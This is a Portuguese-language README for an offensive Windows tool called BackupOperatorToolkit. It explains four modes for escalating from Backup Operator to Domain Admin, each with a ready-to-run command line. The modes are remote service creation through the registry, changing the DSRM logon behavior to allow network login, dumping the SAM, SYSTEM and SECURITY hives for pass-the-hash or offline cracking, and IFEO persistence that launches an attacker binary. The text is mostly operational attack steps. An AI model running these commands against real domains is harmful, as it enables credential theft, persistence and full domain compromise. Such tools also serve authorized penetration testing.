
Escale de Operador de Backup para Administrador de Domínio usando quatro técnicas: criação remota de serviços, manipulação de registro DSRM, despejo de hive SAM/SYSTEM e persistência IFEO para movimento lateral e escalonamento de privilégios.
O BackupOperatorToolkit (BOT) tem 4 modos diferentes que permitem escalar de Operador de Backup para Administrador de Domínio.
Use "runas.exe /netonly /user:dominio.dk\operadordebackup powershell.exe" antes de executar a ferramenta.
O modo SERVICE cria um serviço no host remoto que será executado quando o host for reiniciado.
O serviço é criado modificando o registro remoto. Isso é possível passando o valor "REG_OPTION_BACKUP_RESTORE" para RegOpenKeyExA e RegSetValueExA.
Não é possível fazer o serviço ser executado imediatamente, pois o banco de dados do gerenciador de controle de serviços "SERVICES_ACTIVE_DATABASE" é carregado na memória durante a inicialização e só pode ser modificado com privilégios de administrador local, que o Operador de Backup não possui.
.\BackupOperatorToolkit.exe SERVICE \\CAMINHO\Para\Servico.exe \\ALVO.DOMINIO.DK NOMEDOSERVICO NOMEDEEXIBICAO DESCRICAO

O modo DSRM define a chave de registro DsrmAdminLogonBehavior encontrada em "HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" para 0, 1 ou 2.
Definir o valor como 0 permitirá que a conta DSRM seja usada apenas no modo de recuperação.
Definir o valor como 1 permitirá que a conta DSRM seja usada quando o serviço Directory Services estiver parado e o NTDS estiver desbloqueado.
Definir o valor como 2 permitirá que a conta DSRM seja usada com autenticação de rede, como WinRM.
Se o modo DUMP foi usado e a conta DSRM foi quebrada offline, defina o valor como 2 e faça login no Controlador de Domínio com a conta DSRM, que será administrador local.
.\BackupOperatorToolkit.exe DSRM \\ALVO.DOMINIO.DK 0||1||2

O modo DUMP despeja as colmeias SAM, SYSTEM e SECURITY em um caminho local no host remoto ou envia os arquivos para um compartilhamento de rede.
Depois que as colmeias forem despejadas, você pode usar PtH com o hash do Controlador de Domínio, quebrar o DSRM e habilitar a autenticação de rede, ou possivelmente autenticar com outra conta encontrada nos despejos. Contas de outras florestas podem estar armazenadas nesses arquivos; não sei o motivo, mas isso foi observado em comprometimentos com florestas de gerenciamento.
Este modo é inspirado no projeto BackupOperatorToDA.
.\BackupOperatorToolkit.exe DUMP \\CAMINHO\Para\Despejo \\ALVO.DOMINIO.DK

O modo IFEO (Image File Execution Options) permite executar um aplicativo quando um processo específico é encerrado.
Isso pode conceder um shell antes do modo SERVICE, caso o host alvo seja muito utilizado e raramente reinicializado.
O executável será executado como filho do processo WerFault.exe.
.\BackupOperatorToolkit.exe IFEO notepad.exe \\Caminho\Para\pwn.exe \\ALVO.DOMINIO.DK
